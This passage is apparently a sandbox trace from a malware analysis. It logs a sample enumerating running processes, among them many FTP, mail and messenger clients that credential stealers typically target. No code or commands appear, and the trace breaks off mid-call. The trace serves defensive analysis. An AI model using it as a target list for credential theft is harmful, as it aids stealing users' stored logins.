th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.917] lstrlenW (lpString="winlogon.exe") returned 12 [0180.917] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.917] lstrlenW (lpString="services.exe") returned 12 [0180.917] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.918] lstrlenW (lpString="lsass.exe") returned 9 [0180.918] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.919] lstrlenW (lpString="svchost.exe") returned 11 [0180.919] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0180.922] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0180.923] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0180.923] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0180.923] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.924] lstrlenW (lpString="svchost.exe") returned 11 [0180.924] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.925] lstrlenW (lpString="dwm.exe") returned 7 [0180.925] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x65, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.926] lstrlenW (lpString="svchost.exe") returned 11 [0180.926] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.926] lstrlenW (lpString="svchost.exe") returned 11 [0180.926] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.927] lstrlenW (lpString="svchost.exe") returned 11 [0180.927] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.928] lstrlenW (lpString="svchost.exe") returned 11 [0180.928] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.928] lstrlenW (lpString="svchost.exe") returned 11 [0180.928] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.929] lstrlenW (lpString="svchost.exe") returned 11 [0180.929] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.930] lstrlenW (lpString="svchost.exe") returned 11 [0180.930] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.930] lstrlenW (lpString="svchost.exe") returned 11 [0180.931] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.931] lstrlenW (lpString="svchost.exe") returned 11 [0180.931] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.932] lstrlenW (lpString="svchost.exe") returned 11 [0180.932] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.933] lstrlenW (lpString="spoolsv.exe") returned 11 [0180.933] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.933] lstrlenW (lpString="svchost.exe") returned 11 [0180.933] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.934] lstrlenW (lpString="audiodg.exe") returned 11 [0180.934] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0180.935] lstrlenW (lpString="sihost.exe") returned 10 [0180.935] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.936] lstrlenW (lpString="svchost.exe") returned 11 [0180.936] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0180.937] lstrlenW (lpString="taskhostw.exe") returned 13 [0180.937] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.937] lstrlenW (lpString="explorer.exe") returned 12 [0180.937] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0180.938] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0180.938] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0180.939] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0180.939] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0180.939] lstrlenW (lpString="Memory Compression") returned 18 [0180.940] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0180.940] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0180.940] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0180.941] lstrlenW (lpString="SearchUI.exe") returned 12 [0180.941] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0180.942] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0180.942] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.942] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0180.942] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0180.943] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0180.943] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0180.944] lstrlenW (lpString="workers.exe") returned 11 [0180.944] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0180.944] lstrlenW (lpString="succeed.exe") returned 11 [0180.945] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0180.945] lstrlenW (lpString="washer jar.exe") returned 14 [0180.945] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0180.946] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0180.946] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0180.947] lstrlenW (lpString="useful_courts.exe") returned 17 [0180.947] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0180.947] lstrlenW (lpString="compounds spanish.exe") returned 21 [0180.947] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0180.948] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0180.948] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0180.949] lstrlenW (lpString="try.exe") returned 7 [0180.949] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0180.950] lstrlenW (lpString="statuteide.exe") returned 14 [0180.950] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0180.950] lstrlenW (lpString="invite.exe") returned 10 [0180.950] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0180.959] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0180.959] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0180.960] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0180.960] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0180.961] lstrlenW (lpString="modules_recommend.exe") returned 21 [0180.961] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0180.961] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0180.961] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.962] lstrlenW (lpString="svchost.exe") returned 11 [0180.962] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0180.963] lstrlenW (lpString="3dftp.exe") returned 9 [0180.963] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0180.963] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0180.964] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0180.964] lstrlenW (lpString="alftp.exe") returned 9 [0180.964] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0180.965] lstrlenW (lpString="barca.exe") returned 9 [0180.965] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0180.967] lstrlenW (lpString="bitkinex.exe") returned 12 [0180.967] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0180.968] lstrlenW (lpString="coreftp.exe") returned 11 [0180.968] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0180.969] lstrlenW (lpString="far.exe") returned 7 [0180.969] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0180.970] lstrlenW (lpString="filezilla.exe") returned 13 [0180.971] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0180.972] lstrlenW (lpString="flashfxp.exe") returned 12 [0180.972] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0180.973] lstrlenW (lpString="fling.exe") returned 9 [0180.973] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0180.974] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0180.974] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0180.975] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0180.975] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0180.977] lstrlenW (lpString="icq.exe") returned 7 [0180.977] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0180.978] lstrlenW (lpString="leechftp.exe") returned 12 [0180.978] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0180.979] lstrlenW (lpString="ncftp.exe") returned 9 [0180.979] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0180.980] lstrlenW (lpString="notepad.exe") returned 11 [0180.980] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0180.981] lstrlenW (lpString="operamail.exe") returned 13 [0180.981] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0180.983] lstrlenW (lpString="pidgin.exe") returned 10 [0180.983] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0180.984] lstrlenW (lpString="scriptftp.exe") returned 13 [0180.984] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0180.985] lstrlenW (lpString="skype.exe") returned 9 [0180.985] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0180.986] lstrlenW (lpString="smartftp.exe") returned 12 [0180.986] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0180.987] lstrlenW (lpString="thunderbird.exe") returned 15 [0180.988] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0180.989] lstrlenW (lpString="totalcmd.exe") returned 12 [0180.989] Process32NextW (in: hSnapshot=0x354, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0180.990] lstrlenW (lpString="trillian.exe") returned 12 [0180.990] Process32NextW (in: 